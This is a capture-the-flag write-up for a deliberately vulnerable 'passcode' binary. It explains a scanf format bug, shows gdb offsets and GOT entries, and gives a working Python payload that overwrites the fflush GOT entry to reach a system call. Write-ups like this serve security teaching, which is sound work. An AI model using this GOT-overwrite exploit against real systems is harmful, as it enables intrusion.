# passcode

This challenge comes in the form of a binary, here is what we know after analyzing
the source code and the binary:

- The program uses two vulnerable scanf calls:
	```
	passcode.c:9:14: warning: format specifies type 'int *' but the argument has type 'int' [-Wformat]
        scanf("%d", passcode1);
               ~~   ^~~~~~~~~
passcode.c:14:21: warning: format specifies type 'int *' but the argument has type 'int' [-Wformat]
        scanf("%d", passcode2);
	```

- We can write data at an arbitrary location with the first scanf

	In the welcome() function, there is a char buffer called name of size 100,
	When viewing in gdb it is stored at ebp-0x70
	In the login() function at the first scanf, the data is written at the adress
	contained in ebp-0x10.

- 0x70 - 0x10 = 0x60 = 96 bytes

	Therefore we can control where scanf should store the data with le last 4bytes of name[100].

# solution

A possible solution is to fill 96 bytes of memory in name[100], and then overwrite 
the GOT of the next printf or flush call

```
passcode@ubuntu:~$ objdump -R passcode

passcode:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a02c R_386_COPY        stdin
0804a000 R_386_JUMP_SLOT   printf
0804a004 R_386_JUMP_SLOT   fflush
0804a008 R_386_JUMP_SLOT   __stack_chk_fail
0804a00c R_386_JUMP_SLOT   puts
0804a010 R_386_JUMP_SLOT   system
0804a014 R_386_JUMP_SLOT   __gmon_start__
0804a018 R_386_JUMP_SLOT   exit
0804a01c R_386_JUMP_SLOT   __libc_start_main
0804a020 R_386_JUMP_SLOT   __isoc99_scanf
```

and replace it with the adress of the system call, but since scanf reads an int
I need to convert it to decimal

```
in gdb
   0x080485e3 <+127>:	mov    DWORD PTR [esp],0x80487af	<-- here
   0x080485ea <+134>:	call   0x8048460 <system@plt>
   0x080485ef <+139>:	leave

@jed ➜  passcode git:(master) ✗ echo $((16#080485e3))
134514147

```

here is my payload

```
python -c 'print "\x41" * 96 + "\x04\xa0\x04\x08" + "134514147" + "\n" ' | ./passcode
```

